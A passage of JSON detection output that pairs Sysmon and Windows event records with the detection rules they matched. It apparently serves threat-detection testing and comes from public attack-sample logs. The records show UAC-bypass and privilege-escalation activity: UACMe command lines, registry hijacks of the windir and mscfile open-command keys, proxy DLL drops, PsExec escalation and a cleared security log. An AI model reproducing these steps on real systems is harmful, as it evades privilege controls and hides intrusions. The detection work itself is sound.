Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-5461-5EBA-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":580,"ProcessGuid":"747F3D96-DE32-5EB9-0000-00103FC14300","ProcessId":5252,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-05-11 23:22:26.451"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":142033,"Execution":{"#attributes":{"ProcessID":2896,"ThreadID":3548}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-05-11T23:22:26.650196Z"}},"Version":5}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Users\\Public\\psexecprivesc.exe\" 
C:\\Windows\\System32\\mspaint.exe","Company":"?","CurrentDirectory":"C:\\Users\\Public\\","Description":"?","FileVersion":"?","Hashes":"SHA1=D7BADB1E51B7F5AB36D218854698215436C77D69,MD5=45C9D210322AC8F8AEC6D2AB003F82A9,SHA256=F60E25BFB2BF7CB3E3CBD47F6A6D12941BD0BC0CF5B5626415607FDF0ACD2132,IMPHASH=6BC87C5562804B37769BD928D309AFDA","Image":"C:\\Users\\Public\\psexecprivesc.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-FBCC-5FD0-0000-0020CB857400","LogonId":"0x7485cb","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-FBFF-5FD0-0000-0010BEC87C00","ParentProcessId":14512,"ProcessGuid":"747F3D96-00D2-5FD1-0000-0010FA4C5301","ProcessId":13004,"Product":"?","RuleName":"","TerminalSessionId":3,"User":"MSEDGEWIN10\\user02","UtcTime":"2020-12-09 16:52:34.559"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":549480,"Execution":{"#attributes":{"ProcessID":3572,"ThreadID":5040}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-12-09T16:52:34.562791Z"}},"Version":5}}}},{"detection":["PsExec Service Start"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\PSEXESVC.exe","Company":"Sysinternals","CurrentDirectory":"C:\\Windows\\system32\\","Description":"PsExec 
Service","FileVersion":"2.2","Hashes":"SHA1=A17C21B909C56D93D978014E63FB06926EAEA8E7,MD5=75B55BB34DAC9D02740B9AD6B6820360,SHA256=141B2190F51397DBD0DFDE0E3904B264C91B6F81FEBC823FF0C33DA980B69944,IMPHASH=67012475995FB9027F4511245B57DDEA","Image":"C:\\Windows\\PSEXESVC.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-76FA-5FD1-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"psexesvc.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":632,"ProcessGuid":"747F3D96-00D9-5FD1-0000-001021855301","ProcessId":16344,"Product":"Sysinternals PsExec","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-12-09 16:52:41.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":549482,"Execution":{"#attributes":{"ProcessID":3572,"ThreadID":5040}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-12-09T16:52:41.861437Z"}},"Version":5}}}},{"detection":["UAC Bypass Tool UACMe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"Akagi.exe 58 c:\\Windows\\System32\\cmd.exe","Company":"Hazardous Environments","CurrentDirectory":"C:\\Users\\IEUser\\Tools\\PrivEsc\\","Description":"UACMe main 
module","FileVersion":"3.2.5.2005","Hashes":"SHA1=874C9878FF9C1A9AC60658E83649370EA4E61829,MD5=FD17237A6B50C51CBEB45A28E0284063,SHA256=B4E9DCFC87014B2B70CC9E3CD4E34AE4425E40C81A2ED008C7D335E3F96ADD19,IMPHASH=FF31A97D8C8EBEBDA4D7B3DF95E756F1","Image":"C:\\Users\\IEUser\\Tools\\PrivEsc\\Akagi.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-B086-5EBA-0000-0020EF9E0800","LogonId":"0x89eef","OriginalFileName":"Akagi.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-B093-5EBA-0000-0010E7350E00","ParentProcessId":6708,"ProcessGuid":"747F3D96-BB89-5EBA-0000-001057413600","ProcessId":1036,"Product":"UACMe","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-05-12 15:06:49.006"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":143173,"Execution":{"#attributes":{"ProcessID":2856,"ThreadID":3608}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-05-12T15:06:49.019031Z"}},"Version":5}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\DNeruK","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-BB89-5EBA-0000-001057413600","ProcessId":1036,"RuleName":"PrivEsc - Rogue Windir - UAC bypass prep","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Environment\\windir","UtcTime":"2020-05-12 
15:06:49.118"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":143174,"Execution":{"#attributes":{"ProcessID":2856,"ThreadID":3608}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-05-12T15:06:49.183867Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-05-12 15:06:49.134","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-BB89-5EBA-0000-001057413600","ProcessId":1036,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\DNeruK\\system32\\Clipup.exe","UtcTime":"2020-05-12 15:06:49.134"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":143175,"Execution":{"#attributes":{"ProcessID":2856,"ThreadID":3608}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-05-12T15:06:49.184059Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-11 16:54:02.305","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-FE2A-5CD6-0000-00107E091700","ProcessId":2028,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\CRYPTBASE.dll","UtcTime":"2019-05-11 16:54:02.305"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15987,"Execution":{"#attributes":{"ProcessID":2008,"ThreadID":1992}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-11T16:54:02.305766Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-11 16:54:07.462","Image":"C:\\Windows\\System32\\makecab.exe","ProcessGuid":"365ABB72-FE2F-5CD6-0000-001019201700","ProcessId":2956,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\suspicious.cab","UtcTime":"2019-05-11 
16:54:07.462"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15989,"Execution":{"#attributes":{"ProcessID":2008,"ThreadID":1992}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-11T16:54:07.524516Z"}},"Version":2}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"byeintegrity5-uac.exe","Company":"?","CurrentDirectory":"C:\\Users\\Public\\tools\\privesc\\uac\\","Description":"?","FileVersion":"?","Hashes":"SHA1=DF21EC2A3D7EE2AE853C29CBD8AB774A78ED7BF4,MD5=8671D1F95CC31E33F61DEF8C99B42B64,SHA256=2D41A174EA0589F39AA267F829870131AE18CFF1B19648C118DC5A00AEAF078B,IMPHASH=EA12F696E9727F4454BA1EFA0CAFAD2D","Image":"C:\\Users\\Public\\tools\\privesc\\uac\\byeintegrity5-uac.exe","IntegrityLevel":"Medium","LogonGuid":"00247C92-3404-5FBE-0000-002044CA0600","LogonId":"0x6ca44","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"00247C92-BB27-5FBF-0000-0010F69CFA0A","ParentProcessId":12228,"ProcessGuid":"00247C92-E803-5FBF-0000-0010D1B5B40C","ProcessId":11644,"Product":"?","RuleName":"","TerminalSessionId":1,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-11-26 
17:38:11.137"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2362764,"Execution":{"#attributes":{"ProcessID":5900,"ThreadID":6484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-11-26T17:38:11.138458Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-11-26 17:38:11.146","Image":"C:\\Users\\Public\\tools\\privesc\\uac\\byeintegrity5-uac.exe","ProcessGuid":"00247C92-E803-5FBF-0000-0010D1B5B40C","ProcessId":11644,"RuleName":"","TargetFilename":"C:\\Users\\Public\\tools\\privesc\\uac\\system32\\npmproxy.dll","UtcTime":"2020-11-26 17:38:11.146"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2362765,"Execution":{"#attributes":{"ProcessID":5900,"ThreadID":6484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-11-26T17:38:11.147605Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer","Execution from Suspicious Folder","Suspicious Program Location with Network 
Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Users\\Public\\tools\\privesc\\uac","EventType":"SetValue","Image":"C:\\Users\\Public\\tools\\privesc\\uac\\byeintegrity5-uac.exe","ProcessGuid":"00247C92-E803-5FBF-0000-0010D1B5B40C","ProcessId":11644,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1586556212-2165235939-1437495523-1001\\Environment\\systemroot","UtcTime":"2020-11-26 17:38:11.151"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2362767,"Execution":{"#attributes":{"ProcessID":5900,"ThreadID":6484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-11-26T17:38:11.152295Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-08-03 12:06:53.846","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-78DD-5D45-0000-0010B8A50301","ProcessId":5080,"RuleName":"PrivEsc - UAC Bypass UACME 23","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\dismcore.dll","UtcTime":"2019-08-03 
12:06:53.846"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5429,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T12:06:53.933988Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-08-04 09:33:57.716","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-A685-5D46-0000-00109B2AD703","ProcessId":3916,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\Fubuki.exe","UtcTime":"2019-08-04 09:33:57.716"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5763,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-04T09:33:57.800853Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-08-03 15:08:06.372","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-A356-5D45-0000-001029AA9901","ProcessId":4480,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\pe386.dll","UtcTime":"2019-08-03 15:08:06.372"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5527,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T15:08:06.419322Z"}},"Version":2}}}},{"detection":["Suspicious Driver Load from Temp"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"Hazardous Environments","Description":"UACMe proxy DLL","FileVersion":"3.1.9.1905","Hashes":"SHA1=60BFDEAE730B165AF65A82817CED76F7400C9CF0,MD5=CC591D9CA772C818093FED853BF64848,SHA256=EC793B0A45BDB2F15D210E545A893AA096D68FF537DD022C4B443BDE2A448491,IMPHASH=069E5461D2FBAD8D4C3909C4E0340847","Image":"C:\\Windows\\System32\\mmc.exe","ImageLoaded":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\pe386.dll","ProcessGuid":"747F3D96-A356-5D45-0000-001014F99901","ProcessId":4056,"Product":"UACMe","RuleName":"Execution - Image Loaded from suspicious path","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2019-08-03 
15:08:07.340"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":5531,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T15:08:07.508962Z"}},"Version":3}}}},{"detection":["MMC Spawning Windows Shell"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-56A3-5D45-0000-0020B3D31800","LogonId":"0x18d3b3","ParentCommandLine":"\"C:\\Windows\\System32\\mmc.exe\" eventvwr.msc","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"747F3D96-A356-5D45-0000-001014F99901","ParentProcessId":4056,"ProcessGuid":"747F3D96-A357-5D45-0000-0010BD149A01","ProcessId":5396,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-03 
15:08:07.355"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5532,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T15:08:07.558917Z"}},"Version":5}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"365ABB72-88DC-5CD3-0000-00100DA51A00","ProcessId":2704,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\mscfile\\shell\\open\\command\\(Default)","UtcTime":"2019-05-09 01:59:28.669"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":11112,"Execution":{"#attributes":{"ProcessID":1980,"ThreadID":1904}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-09T01:59:28.669022Z"}},"Version":2}}}},{"detection":["UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows 
PowerShell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-863B-5CD3-0000-00204A390100","LogonId":"0x1394a","ParentCommandLine":"\"C:\\Windows\\system32\\eventvwr.exe\" ","ParentImage":"C:\\Windows\\System32\\eventvwr.exe","ParentProcessGuid":"365ABB72-8980-5CD3-0000-00105F451F00","ParentProcessId":3884,"ProcessGuid":"365ABB72-8980-5CD3-0000-0010134D1F00","ProcessId":3840,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-09 01:59:28.903"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":11116,"Execution":{"#attributes":{"ProcessID":1980,"ThreadID":1904}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-09T01:59:29.090897Z"}},"Version":5}}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1102,"EventRecordID":161471,"Execution":{"#attributes":{"ProcessID":1276,"ThreadID":6720}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-15T18:04:36.333991Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"MSEDGEWIN10","SubjectLogonId":"0x52a7d","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3461203602-4096304019-2269080069-1000"}}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-08-03 13:50:26.727","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-9122-5D45-0000-0010710D6101","ProcessId":3508,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\Fubuki.exe","UtcTime":"2019-08-03 
13:50:26.727"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5518,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T13:50:26.782725Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-08-03 12:31:14.985","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-7E92-5D45-0000-0010FF472601","ProcessId":4884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\GdiPlus.dll","UtcTime":"2019-08-03 